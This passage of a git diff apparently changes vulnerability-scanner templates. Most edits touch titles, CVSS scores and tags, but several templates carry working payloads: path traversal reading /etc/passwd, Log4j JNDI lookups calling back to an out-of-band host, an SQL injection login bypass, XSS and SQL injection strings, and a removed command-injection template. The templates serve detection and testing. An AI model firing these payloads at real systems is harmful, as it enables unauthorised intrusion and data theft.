         Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
 
+      - |
+        GET /user.php?act=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
+
+    stop-at-first-match: true
+    matchers-condition: or
     matchers:
       - type: word
         words:
@@ -26,3 +40,9 @@ requests:
           - '[0] => Array'
           - 'MySQL server error report:Array'
         condition: and
+
+      - type: word
+        words:
+          - "PHP Extension"
+          - "PHP Version"
+        condition: and
diff --git a/vulnerabilities/other/eibiz-lfi.yaml b/vulnerabilities/other/eibiz-lfi.yaml
index 5ba1f5f9d8..99707662ea 100644
--- a/vulnerabilities/other/eibiz-lfi.yaml
+++ b/vulnerabilities/other/eibiz-lfi.yaml
@@ -1,13 +1,17 @@
 id: eibiz-lfi
 
 info:
-  name: Eibiz i-Media Server Digital Signage 3.8.0 File Path Traversal
+  name: Eibiz i-Media Server Digital Signage 3.8.0 - Local File Inclusion
   author: 0x_akoko
   severity: high
-  description: An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the oldfile GET parameter.
+  description: Eibiz i-Media Server Digital Signage 3.8.0 is vulnerable to local file inclusion. An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the oldfile GET parameter.
   reference:
     - https://packetstormsecurity.com/files/158943/Eibiz-i-Media-Server-Digital-Signage-3.8.0-File-Path-Traversal.html
-  tags: windows,lfi,eibiz
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: lfi,eibiz,packetstorm,windows
 
 requests:
   - method: GET
@@ -22,3 +26,5 @@ requests:
           - "fonts"
           - "extensions"
         condition: and
+
+# Enhanced by mp on 2022/07/22
diff --git a/vulnerabilities/other/elFinder-path-traversal.yaml b/vulnerabilities/other/elFinder-path-traversal.yaml
new file mode 100644
index 0000000000..fd0d19032e
--- /dev/null
+++ b/vulnerabilities/other/elFinder-path-traversal.yaml
@@ -0,0 +1,37 @@
+id: elFinder-path-traversal
+
+info:
+  name: elFinder  <=2.1.12 - Local File Inclusion
+  author: ritikchaddha
+  severity: high
+  description: |
+    elFinder through 2.1.12 is vulnerable to local file inclusion via Connector.minimal.php in std42. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
+  reference:
+    - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
+  metadata:
+    verified: true
+    shodan-query: title:"elfinder"
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: lfi,elfinder
+
+requests:
+  - raw:
+      - |
+        GET /php/connector.minimal.php?cmd=file&target=l1_Li8vLi4vLy4uLy8uLi8vLi4vLy4uLy8uLi9ldGMvcGFzc3dk&download=1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/26
diff --git a/vulnerabilities/other/elasticsearch5-log4j-rce.yaml b/vulnerabilities/other/elasticsearch5-log4j-rce.yaml
new file mode 100644
index 0000000000..9805dbd6a9
--- /dev/null
+++ b/vulnerabilities/other/elasticsearch5-log4j-rce.yaml
@@ -0,0 +1,50 @@
+id: elasticsearch5-log4j-rce
+
+info:
+  name: Elasticsearch 5 - Log4j Remote Code Execution
+  author: akincibor
+  severity: critical
+  description: |
+    A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted Elasticsearch 5.
+  reference:
+    - https://www.horizon3.ai/the-long-tail-of-log4shell-exploitation/
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  metadata:
+    verified: true
+  tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021
+
+requests:
+  - raw:
+      - |
+        GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D HTTP/1.1
+        Host: {{Hostname}}
+
+        {
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Match for extracted ${hostName} variable
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip # Print remote interaction IP in output
+
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${hostName} in output
diff --git a/vulnerabilities/other/empirecms-xss.yaml b/vulnerabilities/other/empirecms-xss.yaml
index edc848b882..6fa8d62c0b 100644
--- a/vulnerabilities/other/empirecms-xss.yaml
+++ b/vulnerabilities/other/empirecms-xss.yaml
@@ -1,7 +1,7 @@
 id: empirecms-xss
 
 info:
-  name: EmpireCMS v75 XSS
+  name: EmpireCMS v75 Cross-Site Scripting
   author: pikpikcu
   severity: medium
   reference:
diff --git a/vulnerabilities/other/ems-sqli.yaml b/vulnerabilities/other/ems-sqli.yaml
new file mode 100644
index 0000000000..f642b72dc3
--- /dev/null
+++ b/vulnerabilities/other/ems-sqli.yaml
@@ -0,0 +1,39 @@
+id: ems-sqli
+
+info:
+  name: Employee Management System 1.0 - SQLi Authentication Bypass
+  author: arafatansari
+  severity: high
+  description: |
+    Employee Management System Login page can be bypassed with a simple SQLi to the username parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/48882
+    - https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip
+  metadata:
+    verified: true
+  tags: ems,sqli,cms,auth-bypass,edb
+
+requests:
+  - raw:
+      - |
+        POST /process/aprocess.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        mailuid=admin' or 1=1#&pwd=nuclei&login-submit=Login
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Admin Panel'
+          - 'Log Out'
+          - 'Employee Management System'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/other/eris-xss.yaml b/vulnerabilities/other/eris-xss.yaml
new file mode 100644
index 0000000000..29bf5c34c0
--- /dev/null
+++ b/vulnerabilities/other/eris-xss.yaml
@@ -0,0 +1,38 @@
+id: eris-xss
+
+info:
+  name: Complete Online Job Search System v1.0 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Complete Online Job Search System v1.0 is vulnerable to Reflected Cross Site Scripting via index.php?q=advancesearch.
+  metadata:
+    verified: true
+  tags: cve,cve2022,xss,eris
+
+requests:
+  - raw:
+      - |
+        POST /index.php?q=result&searchfor=advancesearch HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        SEARCH=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&COMPANY=&CATEGORY=&submit=Submit
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Result : <script>alert(document.domain)</script>'
+          - 'ERIS'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/other/etouch-v2-sqli.yaml b/vulnerabilities/other/etouch-v2-sqli.yaml
index 4983e47bcb..93efc456c6 100644
--- a/vulnerabilities/other/etouch-v2-sqli.yaml
+++ b/vulnerabilities/other/etouch-v2-sqli.yaml
@@ -9,10 +9,13 @@ info:
     - https://www.anquanke.com/post/id/168991
   tags: etouch,sqli
 
+variables:
+  num: "999999999"
+
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''"
+      - "{{BaseURL}}/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5({{num}}),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''"
 
     matchers-condition: and
     matchers:
@@ -22,5 +25,5 @@ requests:
 
       - type: word
         words:
-          - "c4ca4238a0b923820dcc509a6f75849b"
+          - '{{md5({{num}})}}'
         part: body
diff --git a/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml b/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml
index d52ba57f9e..2930152563 100644
--- a/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml
+++ b/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml
@@ -1,12 +1,16 @@
 id: ewebs-arbitrary-file-reading
 
 info:
-  name: EWEBS casmain.xgi arbitrary file reading vulnerability
+  name: EWEBS - Local File Inclusion
   author: pikpikcu
   severity: high
-  description: A vulnerability in EWEBS's 'casmain.xgi' endpoint allows remote attackers to disclose the content of locally stored files via the 'Language_S' parameter.
+  description: EWEBS is vulnerable to local file inclusion and allows remote attackers to disclose the content of locally stored files via the 'Language_S' parameter supplied to the 'casmain.xgi' endpoint.
   reference:
     - http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%9E%81%E9%80%9AEWEBS/%E6%9E%81%E9%80%9AEWEBS%20casmain.xgi%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: ewebs,lfi
 
 requests:
@@ -30,3 +34,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/27
diff --git a/vulnerabilities/other/eyou-email-rce.yaml b/vulnerabilities/other/eyou-email-rce.yaml
deleted file mode 100644
index fe580099c6..0000000000
--- a/vulnerabilities/other/eyou-email-rce.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: eyou-email-rce
-
-info:
-  name: eYou E-Mail system RCE
-  author: pikpikcu
-  severity: critical
-  reference:
-    - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
-  tags: rce,eyou
-
-requests:
-  - raw:
-      - |
-        POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        type='|cat /etc/passwd||'
-
-    matchers-condition: and
-    matchers:
-      - type: regex
-        regex:
-          - "root:.*:0:0:"
-        part: body
-
-      - type: status
-        status:
-          - 200
diff --git a/vulnerabilities/other/feifeicms-lfr.yaml b/vulnerabilities/other/feifeicms-lfr.yaml
index 4a074e68dc..1b160dbe3c 100644
--- a/vulnerabilities/other/feifeicms-lfr.yaml
+++ b/vulnerabilities/other/feifeicms-lfr.yaml
@@ -1,12 +1,17 @@
 id: feifeicms-lfr
 
 info:
-  name: FeiFeiCms Local File Read
+  name: FeiFeiCms - Local File Inclusion
   author: princechaddha
   severity: high
+  description: FeiFeiCms is vulnerable to local file inclusion.
   reference:
     - https://www.cnblogs.com/jinqi520/p/10202615.html
     - https://gitee.com/daicuo/feifeicms
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: feifeicms,lfi
 
 requests:
@@ -28,3 +33,5 @@ requests:
           - "db_host"
         condition: and
         part: body
+
+# Enhanced by mp on 2022/07/27
diff --git a/vulnerabilities/other/finecms-sqli.yaml b/vulnerabilities/other/finecms-sqli.yaml
new file mode 100644
index 0000000000..3ad8023e19
--- /dev/null
+++ b/vulnerabilities/other/finecms-sqli.yaml
@@ -0,0 +1,24 @@
+id: finecms-sqli
+
+info:
+  name: FineCMS 5.0.10 - SQL Injection
+  author: ritikchaddha
+  severity: high
+  description: |
+    SQL Injection exists in FineCMS 5.0.10.
+  reference:
+    - https://blog.csdn.net/dfdhxb995397/article/details/101385340
+  tags: finecms,sqli
+
+variables:
+  num: "999999999"
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df&param=action=sql%20sql=%27select%20md5({{num}})%27'
+
+    matchers:
+      - type: word
+        words:
+          - '{{md5({{num}})}}'
diff --git a/vulnerabilities/other/finereport-path-traversal.yaml b/vulnerabilities/other/finereport-path-traversal.yaml
index 0ebcfd9014..57bf30e643 100644
--- a/vulnerabilities/other/finereport-path-traversal.yaml
+++ b/vulnerabilities/other/finereport-path-traversal.yaml
@@ -1,11 +1,16 @@
 id: finereport-path-traversal
 
 info:
-  name: FineReport 8.0 Path Traversal
+  name: FineReport 8.0 - Local File Inclusion
   author: pikpikcu
-  severity: medium
+  severity: high
+  description: FIneReport  8.0 is vulnerable to local file inclusion.
   reference:
     - http://foreversong.cn/archives/1378
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: finereport,lfi
 
 requests:
@@ -26,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/27
diff --git a/vulnerabilities/other/flir-path-traversal.yaml b/vulnerabilities/other/flir-path-traversal.yaml
index 6564db13b2..d181c2445d 100644
--- a/vulnerabilities/other/flir-path-traversal.yaml
+++ b/vulnerabilities/other/flir-path-traversal.yaml
@@ -1,11 +1,16 @@
 id: flir-path-traversal
 
 info:
-  name: Flir Path Traversal
+  name: Flir - Local File Inclusion
   author: pikpikcu
   severity: high
+  description: Flir is vulnerable to local file inclusion.
   reference:
     - https://juejin.cn/post/6961370156484263972
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: flir,lfi
 
 requests:
@@ -24,3 +29,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/27
diff --git a/vulnerabilities/other/geovision-geowebserver-lfi.yaml b/vulnerabilities/other/geovision-geowebserver-lfi.yaml
index 08261363a2..5e2bb3147f 100644
--- a/vulnerabilities/other/geovision-geowebserver-lfi.yaml
+++ b/vulnerabilities/other/geovision-geowebserver-lfi.yaml
@@ -1,13 +1,17 @@
 id: geowebserver-lfi
 
 info:
-  name: GeoVision Geowebserver 5.3.3 - LFI
+  name: GeoVision Geowebserver 5.3.3 - Local File Inclusion
   author: madrobot
   severity: high
-  description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files.
+  description: GeoVision Geowebserver 5.3.3 allows remote unauthenticated attackers to disclose the content of locally stored files via local file inclusion.
   reference:
     - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
-  tags: geowebserver,lfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: packetstorm,geowebserver,lfi
 
 requests:
   - method: GET
@@ -29,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/27
diff --git a/vulnerabilities/other/geovision-geowebserver-xss.yaml b/vulnerabilities/other/geovision-geowebserver-xss.yaml
index 48221d3663..4e1c478d4d 100644
--- a/vulnerabilities/other/geovision-geowebserver-xss.yaml
+++ b/vulnerabilities/other/geovision-geowebserver-xss.yaml
@@ -1,13 +1,17 @@
 id: geowebserver-xss
 
 info:
-  name: GeoVision Geowebserver 5.3.3 - XSS
+  name: GeoVision Geowebserver 5.3.3 - Cross-Site Scripting
   author: madrobot
-  severity: medium
-  description: GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests.
+  severity: high
+  description: GeoVision Geowebserver 5.3.3 and prior versions are vulnerable to several cross-site scripting / HTML injection / local file inclusion / XML injection / code execution vectors because the application fails to properly sanitize user requests.
   reference:
     - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
-  tags: geowebserver,xss
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: geowebserver,xss,packetstorm
 
 requests:
   - raw:
@@ -32,3 +36,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/07/27
diff --git a/vulnerabilities/other/global-domains-lfi.yaml b/vulnerabilities/other/global-domains-lfi.yaml
index a7d542d48b..0a772061e3 100644
--- a/vulnerabilities/other/global-domains-lfi.yaml
+++ b/vulnerabilities/other/global-domains-lfi.yaml
@@ -1,12 +1,17 @@
 id: global-domains-lfi
 
 info:
-  name: Global Domains International Directory traversal Vulnerability
+  name: Global Domains International - Local File Inclusion
   author: 0x_Akoko
   severity: high
+  description: Global Domains International is vulnerable to local file inclusion.
   reference:
     - https://cxsecurity.com/issue/WLB-2018020247
     - http://www.nic.ws
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: globaldomains,lfi,traversal
 
 requests:
@@ -23,3 +28,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/27
diff --git a/vulnerabilities/other/global-domains-xss.yaml b/vulnerabilities/other/global-domains-xss.yaml
index c842000e15..c5e51230bd 100644
--- a/vulnerabilities/other/global-domains-xss.yaml
+++ b/vulnerabilities/other/global-domains-xss.yaml
@@ -1,12 +1,19 @@
 id: global-domains-xss
 
 info:
-  name: Global Domains International XSS
+  name: Global Domains International - Cross-Site Scripting
   author: princechaddha
-  severity: medium
+  severity: high
+  description: |
+    Sites hosted by Global Domains International, Inc. have cross-site scripting and directory traversal vulnerabilities.
   reference:
     - https://cxsecurity.com/issue/WLB-2018020247
-  tags: globaldomains,xss
+    - https://packetstormsecurity.com/files/126545/Global-Domains-International-Cross-Site-Scripting-Traversal.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: globaldomains,xss,packetstorm
 
 requests:
   - method: GET
@@ -28,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by cs on 2022/09/09
diff --git a/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml b/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml
new file mode 100644
index 0000000000..5943e2abd5
--- /dev/null
+++ b/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml
@@ -0,0 +1,65 @@
+id: goanywhere-mft-log4j-rce
+
+info:
+  name: GoAnywhere Managed File Transfer -  Log4j Remote Code Execution
+  author: pussycat0x
+  severity: critical
+  reference:
+    - https://www.goanywhere.com/cve-2021-44228-and-cve-2021-45046-goanywhere-mitigation-steps
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  metadata:
+    verified: true
+    shodan-query: http.html:"GoAnywhere Managed File Transfer"
+  tags: cve,cve2021,jndi,log4j,rce,oast,goanywhere
+
+requests:
+  - raw:
+      - |
+        GET /goanywhere/auth/Login.xhtml HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /goanywhere/auth/Login.xhtml HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Origin: {{RootURL}}
+        Referer: {{RootURL}}/goanywhere/auth/Login.xhtml
+
+        formPanel%3AloginGrid%3Aname=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable
+
+    extractors:
+      - type: regex
+        name: view
+        part: body
+        group: 1
+        regex:
+          - 'javax\.faces\.ViewState:1" value="(.*)" autocomplete'
+        internal: true
+
+      - type: kval
+        kval:
+          - interactsh_ip # Print remote interaction IP in output
+
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output
diff --git a/vulnerabilities/other/goip-1-lfi.yaml b/vulnerabilities/other/goip-1-lfi.yaml
index 6070b4dcc9..4cb87cd16e 100644
--- a/vulnerabilities/other/goip-1-lfi.yaml
+++ b/vulnerabilities/other/goip-1-lfi.yaml
@@ -4,12 +4,15 @@ info:
   name: GoIP-1 GSM - Local File Inclusion
   author: gy741
   severity: high
-  description: Input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker
-    to read arbitrary files on the affected system.
+  description: GoIP-1 GSM is vulnerable to local file inclusion because input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system.
   reference:
     - https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/
     - http://www.hybertone.com/uploadfile/download/20140304125509964.pdf
     - http://en.dbltek.com/latestfirmwares.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: gsm,goip,lfi,iot
 
 requests:
@@ -22,3 +25,5 @@ requests:
       - type: regex
         regex:
           - "root:.*:0:0:"
+
+# Enhanced by mp on 2022/07/27
diff --git a/vulnerabilities/other/graylog-log4j.yaml b/vulnerabilities/other/graylog-log4j.yaml
new file mode 100644
index 0000000000..e36130433f
--- /dev/null
+++ b/vulnerabilities/other/graylog-log4j.yaml
@@ -0,0 +1,55 @@
+id: graylog-log4j
+
+info:
+  name: GrayLog - Remote Code Execution (Apache Log4j)
+  author: DhiyaneshDK
+  severity: critical
+  description: Graylog uses the Log4j 2 Java library to record its own log information. Versions of this library earlier than 2.15.0 are vulnerable to a remote code execution attack, specifically when specially crafted values sent as user input will be logged by Graylog.
+  reference:
+    - https://www.graylog.org/post/graylog-update-for-log4j
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  metadata:
+    verified: true
+    shodan-query: title:"Graylog Web Interface"
+  tags: cve,cve2021,rce,jndi,log4j,graylog
+
+requests:
+  - raw:
+      - |
+        POST /api/system/sessions HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+        Accept: application/json
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        X-Requested-With: XMLHttpRequest
+        X-Requested-By: XMLHttpRequest
+        Content-Type: application/json
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}
+
+        {"username":"${jndi:ldap://${sys:os.name}.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip # Print remote interaction IP in output
+
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output
diff --git a/vulnerabilities/other/groupoffice-lfi.yaml b/vulnerabilities/other/groupoffice-lfi.yaml
index 142e511ab2..3be9406dc0 100644
--- a/vulnerabilities/other/groupoffice-lfi.yaml
+++ b/vulnerabilities/other/groupoffice-lfi.yaml
@@ -1,12 +1,17 @@
 id: groupoffice-lfi
 
 info:
-  name: Groupoffice 3.4.21 Directory Traversal Vulnerability
+  name: Groupoffice 3.4.21 - Local File Inclusion
   author: 0x_Akoko
   severity: high
+  description: Groupoffice 3.4.21 is vulnerable to local file inclusion.
   reference:
     - https://cxsecurity.com/issue/WLB-2018020249
     - http://www.group-office.com
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: groupoffice,lfi,traversal
 
 requests:
@@ -24,3 +29,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/27
diff --git a/vulnerabilities/other/gsoap-lfi.yaml b/vulnerabilities/other/gsoap-lfi.yaml
index fd296bca72..446ea053c3 100644
--- a/vulnerabilities/other/gsoap-lfi.yaml
+++ b/vulnerabilities/other/gsoap-lfi.yaml
@@ -1,12 +1,17 @@
 id: gsoap-lfi
 
 info:
-  name: gSOAP 2.8 - Directory Traversal
+  name: gSOAP 2.8 - Local File Inclusion
   author: 0x_Akoko
+  description: gSOAP 2.8 is vulnerable to local file inclusion.
   severity: high
   reference:
     - https://www.exploit-db.com/exploits/47653
-  tags: gsoap,lfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: edb,gsoap,lfi
 
 requests:
   - raw:
@@ -27,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/27
diff --git a/vulnerabilities/other/h3c-imc-rce.yaml b/vulnerabilities/other/h3c-imc-rce.yaml
index 7448e95f74..2bda791838 100644
--- a/vulnerabilities/other/h3c-imc-rce.yaml
+++ b/vulnerabilities/other/h3c-imc-rce.yaml
@@ -1,14 +1,18 @@
 id: h3c-imc-rce
 
 info:
-  name: H3c IMC RCE
+  name: H3c IMC - Remote Code Execution
   author: pikpikcu
   severity: critical
-  description: A vulnerability in H3C IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint
+  description: H3c IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint.
   reference:
     - https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw
   metadata:
     fofa-query: body="/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui"
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: rce,h3c-imc
 
 requests:
@@ -38,3 +42,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/01
diff --git a/vulnerabilities/other/hanming-lfr.yaml b/vulnerabilities/other/hanming-lfr.yaml
index 9a90adea5b..8dd3d23aeb 100644
--- a/vulnerabilities/other/hanming-lfr.yaml
+++ b/vulnerabilities/other/hanming-lfr.yaml
@@ -1,11 +1,16 @@
 id: hanming-lfr
 
 info:
-  name: Hanming Video Conferencing File Read
+  name: Hanming Video Conferencing - Local File Inclusion
   author: ritikchaddha
   severity: high
+  description: Hanming Video Conferencing is vulnerable to local file inclusion.
   reference:
     - https://mp.weixin.qq.com/s/F-M21PT0xn9QOuwoC8llKA
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: lfr,hanming,lfi
 
 requests:
@@ -28,3 +33,5 @@ requests:
       - type: regex
         regex:
           - "root:[x*]:0:0:"
+
+# Enhanced by mp on 2022/07/27
